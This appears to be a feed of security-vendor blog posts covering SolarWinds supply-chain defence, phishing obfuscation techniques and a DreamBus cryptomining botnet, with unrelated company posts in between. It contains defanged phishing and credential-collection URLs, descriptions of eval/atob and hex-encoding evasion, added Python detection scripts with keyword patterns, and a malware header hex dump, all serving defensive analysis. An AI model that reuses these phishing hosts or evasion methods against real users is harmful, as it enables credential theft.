Even after the installation of the backdoor, the adversary took precautionary steps to avert detection in a sandbox environment—for example, by waiting days before any callback to the command-and-control infrastructure, as well as verifying whether the software was running in a lab vs. production environment. The best opportunity to detect this backdoor and its activity would have been to closely monitor abnormal network activity from the SolarWinds Orion platform as it started to phone home. However, in this case, the actor took care to avoid tipping off the usual signals we are well prepared to detect. For example, the command-and-control infrastructure was set up in the countries of the victims, rather than in geographies we are trained to view with suspicion. Furthermore, to ensure that connections to a newly registered domain did not tip off security operators, the command-and-control domain used was registered well ahead of time, months prior to the suspected start of the campaign. Finally, the adversary included naming conventions of the targeted organizations in the DNS names of the command-and-control infrastructure to mislead security operators into dismissing any potential suspicion as a false-positive finding.

After the initial compromise, the adversary used well-known tools and techniques to harvest admin credentials, establish persistence, and gain remote access to the compromised system. Such activity could have been detected by most endpoint detection and response (EDR) products by monitoring system activity on affected systems. However, in many cases, EDR products are not deployed to server systems, and more attention is paid to endpoints. In short, detection of this specific backdoor implanted in legitimate software was incredibly difficult to accomplish, although far from impossible.

Protecting against supply chain attacks

The big question is: how can we address the supply chain as a potential threat vector moving forward?
While protecting against backdoors or vulnerabilities introduced into trusted software or components by malicious third parties is a difficult undertaking, some of the same principles that helped to defend against island hopping attacks can be applied here as well.

Minimal access required

In the case of attacks against the technologies we use to run our businesses, the basic concepts of a zero trust architecture can provide an effective defensive layer to significantly limit the impact of “trojanized” technologies. If adversaries successfully implant a backdoor into software or hardware that is connected to our networks, or is even part of the network fabric, they still require access beyond the component, and will only have as much access to the environment as the component itself. Therefore, restricting inbound and outbound component access to the minimum of what is absolutely required to function limits adversaries’ ability to exploit their position, potentially dramatically. For this purpose, it is important to analyze any solution not only for the access and privileges it requires to function, but also for who requires access to specific functions within it. For example, any server application that tries to establish a connection to an internet-facing resource should only be allowed to do so for very specific, documented, and expected use cases, such as connecting to update servers or network time servers. At the same time, every solution needs to be analyzed and assessed for exactly the access the solution itself requires to function. For example, if a monitoring solution is put in place, it might not require privileges to write to or make changes on any system. It might even only need read access to a very specific service or set of data, rather than to the system as a whole.
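As an added example (not part of the original article or of any vendor's tooling), the outbound-access restriction described above turned into a check: connections from a monitoring server are compared against its documented list of allowed destinations, and anything outside that list is reported, regardless of how plausible the destination name looks. The log format, hostnames and allowlist entries are constructed.

```python
"""Egress allowlist audit for a privileged server (added example, constructed data).

The text recommends letting a server application reach external resources
only for documented, expected destinations such as update or time servers.
This script checks firewall/proxy log lines for one monitored host against
such a documented allowlist and reports every connection that falls outside
it. The log format, hostnames and allowlist entries are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    host: str   # exact FQDN, or "*.suffix" to match any name under that suffix
    port: int
    proto: str

    def matches(self, dst: str, port: int, proto: str) -> bool:
        if port != self.port or proto != self.proto:
            return False
        if self.host.startswith("*."):
            return dst.endswith(self.host[1:])
        return dst == self.host


# Documented egress for the monitoring server, as a vendor would list it (constructed).
ALLOWLIST = (
    Rule("updates.example-vendor.test", 443, "tcp"),
    Rule("time.example.test", 123, "udp"),
)

# Constructed log format: one key=value record per connection.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+) action=(?P<action>\w+)$"
)


def audit(lines, monitored_src, allowlist=ALLOWLIST):
    """Return (violations, parsed, skipped) for connections from monitored_src.

    A violation is any connection not covered by the documented allowlist. The
    check is deliberately blind to how plausible a destination looks: the text
    notes that command-and-control names were chosen to resemble the victim's
    own naming, so appearance or reputation is not the test here."""
    violations, parsed, skipped = [], 0, 0
    for line in lines:
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            skipped += 1          # malformed record: count it, never silently drop it
            continue
        parsed += 1
        if m["src"] != monitored_src:
            continue
        dst, port, proto = m["dst"].lower(), int(m["dport"]), m["proto"].lower()
        if not any(r.matches(dst, port, proto) for r in allowlist):
            violations.append({"ts": m["ts"], "dst": dst, "dport": port, "proto": proto})
    return violations, parsed, skipped


# Constructed sample log. Line 3 is a destination named after the organisation
# itself; line 4 is the right update host on an undocumented port.
SAMPLE_LOG = """\
2021-01-12T03:14:05Z src=mon-srv-01 dst=updates.example-vendor.test dport=443 proto=tcp action=allow
2021-01-12T03:14:07Z src=mon-srv-01 dst=time.example.test dport=123 proto=udp action=allow
2021-01-12T03:20:11Z src=mon-srv-01 dst=api.example-corp-mon.test dport=443 proto=tcp action=allow
2021-01-12T03:21:00Z src=mon-srv-01 dst=updates.example-vendor.test dport=80 proto=tcp action=allow
2021-01-12T03:22:00Z src=ws-17 dst=www.example.test dport=443 proto=tcp action=allow
malformed record without fields
"""


if __name__ == "__main__":
    found, parsed, skipped = audit(SAMPLE_LOG.splitlines(), "mon-srv-01")
    print(f"parsed={parsed} skipped={skipped} violations={len(found)}")
    for v in found:
        print(f"  {v['ts']} {v['dst']}:{v['dport']}/{v['proto']}")
```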
Strong authentication and monitoring

Finally, a careful assessment of who requires what level of access to an application or system, and how such access can and should be secured, needs to be performed. Such an assessment will provide the access controls that ultimately limit an adversary’s ability to reach and use potentially “trojanized” technology and to move laterally. For example, systems that rely on privileged access to other systems and components in a given environment by definition present high-value targets. Access to these network components or systems should require multifactor authentication for any administrative access, which in itself should be granted on an as-needed basis. The usefulness of the measures described here is in no way limited to what we have observed over the past month surrounding the SolarWinds breach. In particular, limiting access to and from the SolarWinds Orion Platform, and requiring strong authentication to access it, could have made it significantly more difficult for the adversary to exploit the backdoor and gain access to the environment, while making it easier to detect activity that was not expected. After all, the discovery of this attack started with the detection of a suspicious logon event using stolen credentials.

Trusted but verified vendors

Depending on the type of service or industry, different available certifications of cybersecurity practices can help organizations assess how well solution providers are equipped to detect, prevent, and deter unauthorized access to or modification of their data, products, and services. The most prominent of these certifications is likely ISO/IEC 27001, as it asserts that a company not only follows and adheres to security practices that ensure confidentiality, integrity, and availability, but also makes these aspects a responsibility of top management.
Therefore, the first strategy to prevent supply chain attacks is to carefully assess and monitor how your organization’s vendors implement and follow security practices. For example, ISO/IEC 27001 annex 5 specifically calls out such a review of an organization's supply chain. A variety of cybersecurity audits are available to provide certifications for companies attesting to secure system architectures, implementation of security and response processes, and adherence to general security best practices. For example, security certifications for cloud service providers are available and should be mandatory before using such services, with the most prominent example being the SOC 2 certification family. This certification expands the concepts of ISO/IEC 27001 by requiring organizations to implement specific technical and procedural safeguards to guarantee not only availability and integrity of the service provided, but also the security of customer and user-specific data. Another prominent industry-specific example of certifications for cloud service providers is FedRAMP, with its different impact levels, required by the U.S. government. These are just some examples from a long list of certifications that exist, with many specific to industries and geographic areas.

Conclusion

SOLARSTORM surely presents a somewhat rare event, simply because of the amount of planning, the careful execution, and the attention paid to cleaning up. However, the impact it had upon affected organizations is not something that should be dismissed as a once-in-a-lifetime event. Security teams do have the means and capabilities at their disposal not only to detect such attacks earlier than in this case, but also to minimize their impact by limiting the adversary’s ability to establish a foothold and move laterally across the environment.
Aside from monitoring the activity of and on systems and applications that do have privileged access or contain sensitive information, specific access controls can help compartmentalize high-value systems. Access controls and restrictions for such high-value targets can be implemented by applying the concepts of a strict zero trust architecture:

- Restrict outbound traffic from the system or application to the minimum list of applications and resources required to perform its function, as documented by the vendor.
- Restrict local access of the application to the minimum required set of privileges, as documented by the vendor.
- Restrict access to the application or system to only those users who need such access, require multifactor authentication, and limit the permissions such users have on the system to the minimum required to perform their intended tasks.

In a cloud world, in which the internet continues to replace the local network, applying traditional network security paradigms is a losing proposition. As we continue to use the cloud to enable a mobile workforce and a distributed enterprise, security professionals need to rethink their approach to securing the organizations they work in. Such a world needs to be secured in a cloud-native way, with cloud-enabled security capabilities and a strict zero trust architecture.

Mon, 18 Jan 2021 14:39:53 -0800 Martin Walter

A Day of Service in Honor of MLK

“Life’s most persistent and urgent question is: ‘What are you doing for others?’” – Dr. Martin Luther King, Jr.

Every year in mid-January, my daughters and I have an adventure. In the early years, it was picking up trash with other volunteers at a local park, but as they’ve grown, so have the tasks. Two years ago we planted trees at a local park. Last year, we helped clear and plow hard-packed soil to create a 100’ x 8’ community planting bed as a part of a church’s “Dream” garden.
This year, in addition to donating to Dorcas Ministries (link below), we are building hygiene kits for uninsured Wake County residents. It is climate-controlled and much cleaner than past projects, but still impactful. And whatever we do, it’s always rewarding.

As we celebrate Martin Luther King’s birthday this year, there is a different kind of urgency than I’ve felt in years past. We are all facing challenges in the wake of the pandemic, with concerns about our own health and that of our loved ones, as well as the need to juggle work responsibilities with caring for children at home. With so much upheaval, it’s tempting to hunker down and simply try to get through it. But difficult times are exactly when those of us with the good fortune to have our health, a home, and stable jobs should come together to help the most vulnerable members of society. Across the country, communities that were already struggling with low wages, high poverty rates, and food and housing insecurity have been hit particularly hard by the pandemic.

As a member of Zscaler’s new Black networking group, B@Z, I’m proud to announce that B@Z is leading a day of service on Monday, January 18, in honor of Dr. Martin Luther King, Jr.’s birthday, and we are inviting all United States Zscaler employees and their families to participate. Regrettably, it won't be in person this year, but we look forward to widespread participation as the needs are tremendous. The B@Z team has identified six organizations we are encouraging employees to “shop” for or donate to. They include:

- CityTeam
- HomeFirst Services
- Raleigh Rescue Mission
- Dorcas Ministries
- Feeding America
- Food Bank of Central & Eastern North Carolina

Dr. King’s life’s work centered around giving a voice to the voiceless and, in that spirit, we hope to share our good fortune with others. We also hope to celebrate his life by offering a broader sense of his legacy and an opportunity to learn more about him.

About Dr. Martin Luther King, Jr.
Many Americans know Dr. King for one speech he delivered in August 1963. It was truly great and consequential, but it was just one of more than 2,500 speeches King delivered in his 13 years of public life. He wrote five books and his papers are preserved in seven volumes. America’s most influential advocate for peace and justice, Dr. King campaigned, protested, and preached on behalf of people who had been marginalized by those in power. He was deeply committed to nonviolence, but he pushed hard against laws that he believed were unjust and was arrested repeatedly. He was a skillful strategist and teamed with powerful thinkers and doers who coordinated the complex and dangerous Civil Rights Movement. With his father, Dr. King was the co-leader of Ebenezer Baptist Church in Atlanta, which gave him his first platform for addressing social ills. He spoke against the Vietnam War, segregation, and the mistreatment of poor people, regardless of color.[1,2] He formed alliances with politicians, including Robert F. Kennedy, whose support enabled his release from prison during one of his many arrests.[3] He engaged with leaders, including Malcolm X and Billy Graham, from other religions and social standings to advance his ideals. He didn't always find support, but he was willing to give others an opportunity to be on the right side of history. Whether he was sitting at a “whites-only” lunch counter or leading a peaceful march or demonstrating for voting rights, Dr. King was seen as a threat to the American status quo.[4] He was arrested at least 30 times in various civil rights protest actions.[3,5] Here are some examples:[6]

- January 26, 1956 – He was arrested in Montgomery, Alabama, as part of a “Get Tough” campaign to intimidate the bus boycotters. Four days later, on January 30, his home was bombed.
- October 19, 1960 – He was arrested in Atlanta, Georgia, during a sit-in while waiting to be served at a restaurant.
He was sentenced to four months in jail, but after intervention by then-presidential candidate John Kennedy and his brother Robert Kennedy, he was released.
- July 27, 1962 – He was arrested and jailed for holding a prayer vigil in Albany, Georgia.
- April 12, 1963 – He and Ralph Abernathy were arrested in Birmingham, Alabama, for demonstrating without a permit. During his time in jail, he wrote what is now known as his historic “Letter from Birmingham Jail.”
- February 2, 1965 – He was arrested in Selma, Alabama, during a voting rights demonstration. Demonstrations continued and a young man was shot by police. In response, organizers planned a 54-mile march from Selma to the state capitol in Montgomery. Marchers were brutally attacked by law enforcement as they crossed the Edmund Pettus Bridge in Selma, a day that came to be known as Bloody Sunday.

Dr. King was instrumental in the successful actions of multiple civil rights groups, including the National Association for the Advancement of Colored People (NAACP). And in the mid-1950s, the Montgomery Improvement Association (MIA) was formed with the executive committee of the NAACP and the officers of the Montgomery chapter of the NAACP (which was banned at that time in Alabama) to improve the living conditions and end segregation in the city. Rosa Parks was the secretary of the local organization, and her defiance on the bus gave Dr. King, the leader of the MIA, a wider platform that extended beyond the church congregation he led at the time.[7]

The steward of King’s legacy

A theme in the musical Hamilton is that one has no control over “Who lives, who dies, who tells your story.” And just as Elizabeth Hamilton became the champion of her late husband’s legacy, Dr. King's widow, Coretta Scott King, worked tirelessly through the remainder of her life (she survived him by almost 40 years) to ensure her husband's legacy wasn't tarnished by those who did not share his vision.
Because of Coretta Scott King’s efforts, we celebrate Dr. King’s birthday as a federal holiday and his story is told to schoolchildren across America. While his life has been filtered and packaged in many ways to adapt to various audiences, we know that when history is being made, it isn't always neat and tidy. Undeterred in the face of threats, setbacks, arrests, and violence, Dr. King knew that “forward” was the only way to go and that, ultimately, the arc of the moral universe would bend towards justice. Dr. King’s efforts continue to inspire new generations of organizers and activists in pursuit of justice and equality, and his commitment to nonviolence provides a roadmap for societal changes.

Three facts about Dr. King you may not know:

1. King’s birth name was Michael, not Martin. The civil rights leader was born Michael King Jr. on January 15, 1929. In 1934, however, his father, a pastor at Atlanta’s Ebenezer Baptist Church, traveled to Germany and became inspired by the Protestant Reformation leader Martin Luther. As a result, King Sr. changed his own name as well as that of his 5-year-old son.[10]

2. King entered college at the age of 15. King was such a gifted student that he skipped grades nine and 12 before enrolling in 1944 at Morehouse College, the alma mater of his father and maternal grandfather. Although he was the son, grandson, and great-grandson of Baptist ministers, King did not intend to follow the family vocation until Morehouse president Benjamin E. Mays, a noted theologian, convinced him otherwise. King was ordained before graduating college with a degree in sociology.[10]

3. King received his doctorate in systematic theology. After earning a divinity degree from Pennsylvania’s Crozer Theological Seminary, King attended graduate school at Boston University, where he received his Ph.D. degree in 1955.
The title of his dissertation was “A Comparison of the Conceptions of God in the Thinking of Paul Tillich and Henry Nelson Wieman.”[10]

I am grateful to be a part of the Zscaler family, working among kind, compassionate professionals all across the organization. My B@Z team members and I look forward to a successful and rewarding day of service in celebration of Dr. King’s life and legacy.

[1] From MLK to John Lewis, Ebenezer Baptist Church has been a haven for civil rights
[2] [3] [4] [5]
[6] Martin Luther King, Jr. Was Arrested 29 Times For Committing These “Crimes”
[7] NAACP | Dr. Martin Luther King Jr.
[8] Southern Christian Leadership Conference (SCLC) - Civil Rights (U.S. National Park Service)
[9] Martin Luther King Jr. - SNCC Digital Gateway
[10]

Mon, 18 Jan 2021 08:00:02 -0800 Wendi Lester

The Hindsight of 2020 Brings Fresh Perspective for 2021

Happy New Year! None of us could have predicted the tumultuous year that became 2020. Yet the dawn of a new year provides a fresh perspective to better prepare for the opportunities ahead. This past year reaffirmed for all of us the importance of working together towards a common goal, and I am immensely proud of the way in which the Zscaler team worked tirelessly to support the rapidly changing needs of our customers. Almost overnight, organizations around the globe were forced to shift to a work-from-anywhere approach. Zscaler responded quickly to ensure the safety and productivity of employees everywhere. Our Zero Trust Exchange scaled flawlessly as we experienced up to 12x the traffic of pre-pandemic times. Through a comprehensive approach to securing users, data, and applications, Zscaler was able to help customers navigate the unknown with speed and confidence. While our primary focus over the course of 2020 was ensuring the continued productivity of our customers and the safety of our employees, Zscaler had a notable year in several key areas.
Market Leadership

The entire Zscaler team is humbled and immensely proud to be recognized by Gartner as the only leader in the Secure Web Gateway Magic Quadrant. This result is the culmination of 10 years of Magic Quadrant leadership and a recognition of our Zero Trust strategy and execution.

Going Beyond Limits

Zscaler closed 2020 with our Zenith Live virtual event, with over 14,000 customers and partners registering to join us to hear the latest innovations in cloud security and digital transformation along with best practices from over 80 customers, including more than 40 CIOs, CISOs, and CTOs.

Zero Trust Extends to the Cloud

The Zscaler innovation engine is accelerating, and we have recently introduced Zscaler Cloud Protection (ZCP), which extends our zero trust capabilities to protect workloads in the public cloud. We are excited that ZCP has been recognized by CRN as one of the top 10 hottest security tools.

Trusted Advisor

The recent SolarWinds attacks are a stark reminder of the need for continued vigilance. Zscaler has been closely monitoring the situation and is here to help organizations safely navigate questions related to this and other emerging threats. Connect with us to request your security assessment.

The Team

At Zscaler, we value diversity and view our people as our greatest asset. It’s for this reason that I am extremely proud that Zscaler was the recipient of the 2021 Bay Area Great Place to Work award. As we continue to navigate the weeks and months ahead, Zscaler is committed to being the trusted advisor to organizations seeking to accelerate their secure digital transformation journey. We are here to assist you and your organization in any way we can.

Thu, 14 Jan 2021 12:10:00 -0800 Jay Chaudhry

Zscaler Named a 2021 Glassdoor “Best Place to Work”

Zscaler is hiring company-wide—check out our careers page.

To all of our employees who have taken the time to review Zscaler on Glassdoor, thank you.
We appreciate your feedback and your taking the time to share your perspectives on what makes Zscaler one of the best places to work in 2021 and beyond. We know that the phrase “a place to work” took on a new, less-literal meaning last year, as COVID forced all of us around the world to swap our in-office setups for a myriad of impromptu home offices. Unlike other awards, there is no self-nomination or application process with Glassdoor. Instead, it's entirely based on the candid feedback Zscaler employees have voluntarily and anonymously shared. To determine the award’s winners, Glassdoor evaluates all company reviews shared by employees over the past year. For that reason, it’s incredibly humbling, particularly for those of us in People and Culture, to see Zscaler named to Glassdoor's 2021 list of Best Places to Work, even as we navigate these strange and unprecedented times. Despite the challenges of not being able to see each other and work together in person for almost a year now, Zscaler has yet to slow down from either a technology or business perspective—and we whole-heartedly attribute this to our employees’ dedication to customers, driving innovation and executing on priorities, hiring great people (including hundreds that have never been inside a Zscaler office), and collaborating and celebrating team wins in spite of physical distances.

Zscaler is powered by five core values

Zscaler's success, both in terms of business trajectory and as a great place to work, has been built on our core values, which have always been fundamental to everything we do. Here’s a closer look at those values:

Teamwork: We celebrate together. We openly share information. We move as one.

Open communications (candor over politics): When it comes to discussing what’s right, what’s wrong, and what we can do better, nothing is off the table.
Although we have grown and continue to grow at a rapid pace, it’s important to foster an environment where employees feel secure sharing their opinions with others.

Passion (over self-interest): We are fiercely passionate about our work, our company, our colleagues, our customers, and our partners. As an incredibly diverse company, we understand that the passions of our employees may differ; however, this is what continues to make us successful.

Innovation: We are driven to not only innovate cloud transformation through our products but to also innovate in our jobs, whether an engineer, marketer, salesperson, or lawyer.

Customer obsession: We are, above all else, obsessed with our customers’ success. I see us consistently succeeding at this by how we treat customers as partners — not prospects.

Want to join the Zscaler team?

In 2021, Zscaler plans to grow our team as we continue our mission of securely enabling digital transformation for enterprises across the globe. We’re always looking for top-notch talent to join our organization and I encourage you to learn more about some of our current openings. Since the beginning, Zscaler has been a critical business enabler for companies as they move toward a secure, cloud-enabled digital future. If you thrive in a fast-paced environment that will challenge you to do your best work, join us! You will find a supportive culture that celebrates collaboration and creative thinking. You can see your ideas make a tangible difference at Zscaler and for Zscaler customers. And that can have a very real impact on your career.

Wed, 13 Jan 2021 08:00:02 -0800 Greg Pappas

New Phishing Trends and Evasion Techniques

Zscaler ThreatLabZ researchers recently came across multiple phishing campaigns using novel obfuscation and evasion techniques.
In this blog, we will present an analysis of four phishing campaigns and the various obfuscation methods used in each, and describe some of the tools the attackers used to obfuscate their JavaScript code. JavaScript is a powerful, flexible, and popular scripting language used in numerous web applications. There are many packers and obfuscators available to reduce the size of JavaScript code, hide business logic, and make the source code unreadable, and attackers also take advantage of these tools.

Why obfuscate?

Each day, security engines are becoming smarter, using machine learning, heuristics, image recognition, and other innovations to detect phishing attacks. In parallel, attackers are applying new and sophisticated techniques for evading detection, including the use of obfuscation and hosting phishing content on trusted providers such as Google hosting domains. The main purpose of code obfuscation is to protect exposed code by making it extremely hard to decipher and understand, but obfuscation is also heavily used to bypass automated URL analysis engines, which prolongs the malware’s survival. Obfuscation tools are also used by many legitimate websites to protect their code from analysis and theft.

Phishing Campaign 1

This campaign is sophisticated, as demonstrated by the well-designed phishing pages that are difficult to distinguish from legitimate pages. The attackers used the latest tactics to evade detection by signature-based scan engines, with most of the JavaScript code being obfuscated.

URL: tawooos[.]com/commonn/login/?code=<Mail ID>

Figure 1: Microsoft login phishing page

Obfuscated part of source code

The tool used to obfuscate is JavaScript Obfuscator 4.3. It's readily available on multiple free software download sites. In Figure 2, the portion highlighted in red is the function that performs the deobfuscation, and the portion highlighted in blue is an argument to that function.
You can see that there are many backquotes in the source code (highlighted in yellow). This function removes the backquotes, decodes the rest of the data, and returns the decoded code. Figure 2: Microsoft login phishing page source code Deobfuscated source code: A few keywords in the source code are highlighted below. The presence of all of these keywords together can be used to flag this page as phishing. Figure 3: Deobfuscated source code After sending the credentials to the command-and-control (C&C) server, the page redirects the victim to a legitimate Microsoft site. Figure 4: PCAP of phishing page sending the credentials to the server Because the phishing pages are obfuscated, they go undetected by analysis engines. Figure 5: No VT detections

Phishing Campaign 2: In this case, the entire source code has been obscured with multilayered obfuscation. The first layer uses eval-execution obfuscation and Base64 encoding. All of these phishing pages were seen hosted on storage.googleapis[.]com. Like Amazon Simple Storage Service (Amazon S3), storage.googleapis[.]com is a hosting domain used to store and access data on Google Cloud. Many analysis engines whitelist these domains, and attackers take advantage of the fact that these domains/IPs belong to trusted sources. http://storage.googleapis[.]com/asmuggishly-757767673/billing.html Figure 6: Chase Phishing page Part of the source code is Base64 encoded; it is decoded at runtime by atob() and then executed by the eval() function. Figure 7: Source code of Chase phishing page The following is the code after the first round of deobfuscation. It is still heavily obfuscated and not in a readable format. This layer uses hex-encoded function and variable name obfuscation, in which the variable and function names and the strings in the code are encoded as hexadecimal patterns to make the JavaScript code hard to read and detect.
Figure 8: Source code after one round of deobfuscation Once the user submits credentials, they are sent to hxxps://moneysmtp[.]com/email-list/chase-nww/action.php, which is controlled by the attacker, and the user is then redirected to the legitimate Chase website. Figure 9: PCAP of phishing page sending the credentials to the server Below are snapshots of a few phishing pages targeting different brands using the same multilevel obfuscation techniques. Figure 10: Dropbox phishing page Figure 11: Microsoft phishing page

Phishing Campaign 3: is a mobile platform used for building mobile apps hosted by Firebase, which is Google’s mobile app platform. Under this category, all the phishing pages are hosted on the domain and use SSL certificates issued by In this scenario, phishing pages are partially obfuscated with the hex-encoded variable name obfuscation described in the previous case. Here, the tool used to obfuscate the source code is JavaScript Obfuscator. We believe this tool was also used in phishing campaign 2 for some level of obfuscation. This is a free tool with multiple obfuscation levels, such as Low, Medium, and High. The tool is available on GitHub: Online version: This variant mostly targets Microsoft. Figure 12: OneDrive phishing page Figure 13: OneDrive phishing page source code Figure 14: Phishing page source code after deobfuscation To show how attackers continuously abuse Google's trusted domains, the graph below gives a peek into the number of phishing pages hosted on storage.googleapis[.]com and * seen across the Zscaler cloud. (These stats include all blocked transactions and are not specific to the cases in this analysis.) Figure 15: December 2020 blocked transactions for storage.googleapis[.]com and *

Phishing Campaign 4: This variant differs from the previous three cases, where the evasion technique was JavaScript obfuscation.
In this fourth scenario, attackers use embedded Base64 images for evasion, achieved by inflating the size of the source code. The campaign adds all the required images to the source code itself in Base64-encoded form, making it harder for analysis engines to detect these phishing pages. Under this variant, most of the phishing pages are hosted on compromised WordPress websites and target the Microsoft brand. Figure 16: Microsoft phishing page Figure 17: Source code of Base64 encoded images Zscaler has been successfully detecting and blocking all four variants described in this report. Figure 18: Phishing pages seen on Zscaler cloud between Nov 2020 and Jan 2021

Conclusion Phishing attacks have always been on the rise. As security products upgrade their detection methodologies, attackers have upped the ante by evolving how phishing content is delivered and the tactics used to keep phishing pages undetected for longer. The Zscaler ThreatLabZ team continues to monitor these campaigns, as well as others, to help keep our customers safe from phishing attacks.
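As an added example (not code from the ThreatLabZ post), the following Python triage script statically unwraps the eval(atob(...)) layer from campaign 2, decodes the hex-encoded strings of the JavaScript Obfuscator layer seen in campaigns 2 and 3, and measures the share of inline Base64 image data from campaign 4, without executing any JavaScript. The _0x identifier and \xNN escape shapes, the keyword list and the sample page are my assumptions and constructed inputs, not the figures from the post.

```python
"""Added example: static triage of the obfuscation layers described in this post."""
import base64
import re

# Layer 1 (campaign 2): eval(atob("...")), Base64 decoded at run time and executed
EVAL_ATOB_RE = re.compile(r"""eval\s*\(\s*atob\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)""")
# Layer 2 (campaigns 2 and 3): hex-encoded strings and names. The \xNN escape and
# _0x.... identifier shapes are assumed from JavaScript Obfuscator output, not from the post.
HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
HEX_IDENT_RE = re.compile(r"\b_0x[0-9a-fA-F]{3,}\b")
# Campaign 4: images embedded as data: URIs to inflate the page
DATA_IMAGE_RE = re.compile(r"data:image/[a-z+.-]+;base64,([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Keywords whose joint presence we treat as a phishing signal (our choice; the post
# highlights keywords in Figure 3 without listing them)
PHISH_KEYWORDS = ("password", "action.php", "login")


def unwrap_eval_atob(source):
    """Replace every eval(atob("...")) with its decoded payload; return (code, layers)."""
    layers = 0
    while True:
        m = EVAL_ATOB_RE.search(source)
        if m is None:
            return source, layers
        raw = re.sub(r"\s+", "", m.group(1))
        payload = base64.b64decode(raw).decode("utf-8", errors="replace")
        source = source[:m.start()] + payload + source[m.end():]
        layers += 1


def decode_hex_escapes(code):
    """Turn '\\x70\\x61' style string literals back into readable text."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), code)


def inline_image_ratio(html):
    """Fraction of the page taken up by Base64 image data (campaign 4 inflation)."""
    if not html:
        return 0.0
    return sum(len(b) for b in DATA_IMAGE_RE.findall(html)) / len(html)


def analyze(html):
    """Static verdict for one page; every field is derived without running JavaScript."""
    code, layers = unwrap_eval_atob(html)
    readable = decode_hex_escapes(code)
    keywords = sorted(k for k in PHISH_KEYWORDS if k in readable.lower())
    hex_idents = len(set(HEX_IDENT_RE.findall(code)))
    image_ratio = inline_image_ratio(html)
    return {
        "eval_atob_layers": layers,
        "hex_identifiers": hex_idents,
        "keywords": keywords,
        "inline_image_ratio": round(image_ratio, 3),
        # Obfuscation or inflation alone is common on legitimate sites; combine signals
        "suspicious": (layers > 0 or hex_idents > 0 or image_ratio > 0.8) and len(keywords) >= 2,
    }


# Constructed sample in the campaign 2 style: a hex-obfuscated inner script wrapped
# in eval(atob(...)). Not a real phishing page.
INNER_JS = (r"var _0x4a2b=['\x70\x61\x73\x73\x77\x6f\x72\x64',"
            r"'\x61\x63\x74\x69\x6f\x6e\x2e\x70\x68\x70','\x6c\x6f\x67\x69\x6e'];"
            r"function _0x1f3c(_0x5e1d){return _0x4a2b[_0x5e1d];}")
SAMPLE_PAGE = ('<html><body><script>eval(atob("'
               + base64.b64encode(INNER_JS.encode()).decode() + '"));</script></body></html>')

if __name__ == "__main__":
    print(analyze(SAMPLE_PAGE))
```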
Indicators of Compromise:

Fri, 15 Jan 2021 09:24:09 -0800 Kaivalya Khursale DreamBus Botnet – Technical Analysis Zscaler’s ThreatLabZ research team recently analyzed a Linux-based malware family that we have dubbed the DreamBus Botnet. The malware is a variant of SystemdMiner, which consists of a series of Executable and Linkable Format (ELF) binaries and Unix shell scripts. Some components of the botnet have been analyzed in the past with the malware dating back to early 2019. Many of the DreamBus modules are poorly detected by security products. This is in part because Linux-based malware is less common than Windows-based malware, and thus receives less scrutiny from the security community.
However, many critical business systems run on Linux, and malware that is able to gain access to these systems can cause significant disruption and irreparable harm to organizations that fail to secure their servers properly. The DreamBus malware exhibits worm-like behavior that is highly effective in spreading due to its multifaceted approach to propagating itself across the internet and laterally through an internal network using a variety of methods. These techniques include numerous modules that exploit implicit trust, weak passwords, and unauthenticated remote code execution (RCE) vulnerabilities in popular applications, including Secure Shell (SSH), IT administration tools, a variety of cloud-based applications, and databases. These particular applications are targeted because they often run on systems that have powerful underlying hardware with significant amounts of memory and powerful CPUs—all of which allow threat actors to maximize their ability to monetize these resources through mining cryptocurrency. While the primary DreamBus malware payload is an open source Monero cryptocurrency miner known as XMRig, the threat actor could pivot in the future to more destructive activities, such as ransomware or stealing an organization’s data and holding it hostage.
Key Points
DreamBus is a modular Linux-based botnet with worm-like behavior that has been around at least since early 2019
The malware can spread to systems that are not directly exposed to the internet by scanning private RFC 1918 subnet ranges for vulnerable systems
DreamBus uses a combination of implicit trust, application-specific exploits, and weak passwords to gain access to systems such as databases, cloud-based applications, and IT administration tools
The botnet is currently monetized through leveraging infected systems to mine Monero cryptocurrency using XMRig
The threat actor operating DreamBus appears to be located in Russia or Eastern Europe based on the time of deployment for new commands

Technical analysis The main component of DreamBus is an ELF binary that is responsible for setting up the environment, infecting systems with copies of itself, downloading new modules for spreading, and deploying XMRig to mine Monero cryptocurrency. Each DreamBus ELF binary is packed by UPX with a modified header and footer. This alteration is designed to obfuscate the malware’s code and reduce the file size. The magic bytes UPX! (0x21585055) are typically replaced with non-ASCII values. Figure 1 shows an example of the UPX header replaced with the value 0x3330dddf.

00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 02 00 3e 00 01 00 00 00 d0 64 40 00 00 00 00 00 |..>......d@.....|
00000020 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |@...............|
00000030 00 00 00 00 40 00 38 00 03 00 40 00 00 00 00 00 |....@.8...@.....|
00000040 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 |..@.......@.....|
00000060 b5 76 00 00 00 00 00 00 b5 76 00 00 00 00 00 00 |.v.......v......|
00000070 00 00 20 00 00 00 00 00 01 00 00 00 06 00 00 00 |.. .............|
00000080 00 00 00 00 00 00 00 00 00 80 40 00 00 00 00 00 |..........@.....|
00000090 00 80 40 00 00 00 00 00 00 00 00 00 00 00 00 00 |..@.............|
000000a0 78 93 20 00 00 00 00 00 00 10 00 00 00 00 00 00 |x. .............|
000000b0 51 e5 74 64 06 00 00 00 00 00 00 00 00 00 00 00 |Q.td............|
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000000e0 10 00 00 00 00 00 00 00 18 b9 39 c1 df dd 30 33 |..........9...03|
Figure 1. Example UPX header modified by DreamBus

